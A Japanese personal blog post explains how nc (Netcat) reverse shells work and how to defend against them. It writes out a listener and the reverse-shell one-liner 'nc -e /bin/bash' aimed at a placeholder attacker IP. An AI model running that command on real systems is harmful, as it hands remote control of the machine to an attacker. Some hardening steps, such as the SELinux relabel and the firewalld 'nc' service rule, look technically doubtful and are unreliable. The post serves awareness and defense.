【Linux】ncコマンドのリバースシェル攻撃のリスク

Linux

どーも!marusukeです!

ncコマンドでのリバースシェル攻撃リスクと対策について調べてみました!

リバースシェル攻撃のリスク

nc(Netcat)は、ネットワーク接続のテストやデバッグに便利なコマンドですが、攻撃者が悪用すると以下のようなリスクが発生します

1. システムの不正操作

ncを利用してリバースシェルを確立すると、攻撃者がターゲットのシステムを遠隔操作できるようになります。

リバースシェルの実行例

攻撃者が自分のPC(攻撃者のIP)で以下のコマンドを実行して、4444ポートを空けて待機します

nc -l -p 4444

ターゲットマシン上で攻撃者が次のコマンドを実行すると、ターゲットが攻撃者のPCに接続し、シェルを提供します

(攻撃者が以下のコマンドを実行できる状況を作るために、マルウェアやフィッシングによって自動的にコマンドを実行できる状態にしたり、何らかの方法で攻撃者が内部ネットワークに侵入していることが前提にあります)

nc -e /bin/bash 攻撃者のIP 4444

これにより、攻撃者はターゲットのシェルを取得し、自由にコマンドを実行できるようになります

2. ファイアウォール回避

通常、企業ネットワークでは外部からのSSH接続(22番ポート)などを制限しています。しかし、リバースシェルはターゲット側から攻撃者側へ接続するため、アウトバウンド(内部から外部への通信)が許可されていると、ファイアウォールを回避しやすくなります

例:

  • 通常のSSH:管理者 → ターゲット(外部からの接続はブロックされることが多い)
  • リバースシェル:ターゲット → 攻撃者(内側からの通信が許可されていれば成功しやすい)

この特性により、リバースシェルはNAT環境や企業の内部ネットワークでも外部と接続できる可能性があるため、危険性が高まります

3. 権限昇格やデータ流出

  • 攻撃者がroot権限を取得すると、完全な制御が可能になる
  • システム内部の機密データを取得し、外部に送信することが可能
  • ネットワーク内部の他のホストへ攻撃を拡大(横展開)できる

リバースシェル攻撃の対策

ncコマンドがインストールされているだけでは直ちに攻撃されるわけではありませんが、適切なセキュリティ対策を行わないと攻撃のリスクが高まります

1. nc(Netcat)を削除または制限

環境によっては、ncが不要であれば削除または利用を制限することが有効です

削除する場合

sudo yum remove nc

または

sudo dnf remove nc

これにより、ncの利用が完全にできなくなります

アクセス制限をする場合

特定のユーザーだけがncを使用できるように制限する

sudo chmod 750 /usr/bin/nc
sudo chown root:admin /usr/bin/nc

これにより、管理者グループのメンバーのみncを実行できるようになります

2. 不審なプロセスの監視

リバースシェルが仕掛けられていないかを定期的に監視することが重要です

現在の接続を確認

ss -tunlp | grep nc
netstat -tulnp | grep nc

不審なリスニングポートが開かれていないかチェック(netstatは2011年ごろから非推奨なったコマンドです。ssが代替コマンドとなっています。詳しくは以下の記事をご覧ください)

【Linux】ポートを確認する(非推奨):netstat
どーも!marusukeです!現在では非推奨ですが、開いているポートを確認するコマンドnetstatについてです!netstatコマンドでできることnetstat [オプション]netstatコマン...
marusuke-blog.com
2025.01.29

プロセスを監視

ps aux | grep nc

もし不審なncプロセスが動作していた場合、killコマンドで強制終了

sudo kill -9 <プロセスID>

3. ファイアウォールでリバースシェルを防ぐ

ファイアウォールを適切に設定し、内部から外部への通信で不要な通信をブロックする

iptablesを使用する場合

リバースシェルに使われる特定のポートを制限

sudo iptables -A OUTPUT -p tcp --dport 4444 -j DROP

これにより、ターゲットから攻撃者へのリバースシェル通信をブロック可能

firewalldを使用する場合

sudo firewall-cmd --add-rich-rule='rule family="ipv4" service name="nc" reject' --permanent
sudo firewall-cmd --reload

ncを利用した通信をブロックできます

4. SELinux/AppArmorを活用

ncを制限するために、SELinuxやAppArmorを活用することも有効

SELinuxでncの実行を禁止

sudo ausearch -c "nc"
sudo semanage fcontext -a -t bin_t '/usr/bin/nc'
sudo restorecon -v /usr/bin/nc

これにより、ncの実行を制限できます

5. IDS/IPS(侵入検知・防御システム)を導入

SnortSuricata などの侵入検知システム(IDS)を導入し、不審なネットワーク通信を監視する

まとめ

nc(Netcat)が利用可能な環境では、リバースシェル攻撃のリスクが発生する

  • ncを使用すれば、ターゲットマシンから攻撃者へシェル接続を確立できるため、ファイアウォールやNATを回避しやすい

ただし、適切なセキュリティ対策を講じることで、リスクを軽減できる

  • ncを不要なら削除、または適切な権限設定を行う
  • 不審なプロセスや通信の監視(ssコマンドやnetstatコマンドやpsコマンドで確認)
  • ファイアウォールの設定で不要なポートを制限
  • SELinuxやAppArmorを活用し、ncの実行を制限
  • IDS/IPSを導入し、不審な通信を検出

以上です!

ここまで読んでいただきありがとうございました!

【Linux】ポートなどのネットワーク情報を取得する:ss
どーも!marusukeです!開いているポートなどのシステムのネットワーク情報を取得するコマンドss(Socket Statistics)についてです!ssコマンドでできることss [オプション]s...
marusuke-blog.com
2025.01.29
【Linux】ポートを確認する(非推奨):netstat
どーも!marusukeです!現在では非推奨ですが、開いているポートを確認するコマンドnetstatについてです!netstatコマンドでできることnetstat [オプション]netstatコマン...
marusuke-blog.com
2025.01.29
【Linux】:ホスト名を永続的に設定する:hostnamectl
どーも!marusukeです!システムのホスト名を永続的に設定したり、現在のホスト名を確認したりするコマンドhostnamectlについてです!hostnamectlコマンドでできることhostnamectl &#...
marusuke-blog.com
2025.01.29
【Linux】現在のホスト名を確認する:hostname
どーも!marusukeです! 現在のホスト名を確認したり、一時的にホスト名を変更するコマンドhostnameについてです!
marusuke-blog.com
2025.01.28

コメント

タイトルとURLをコピーしました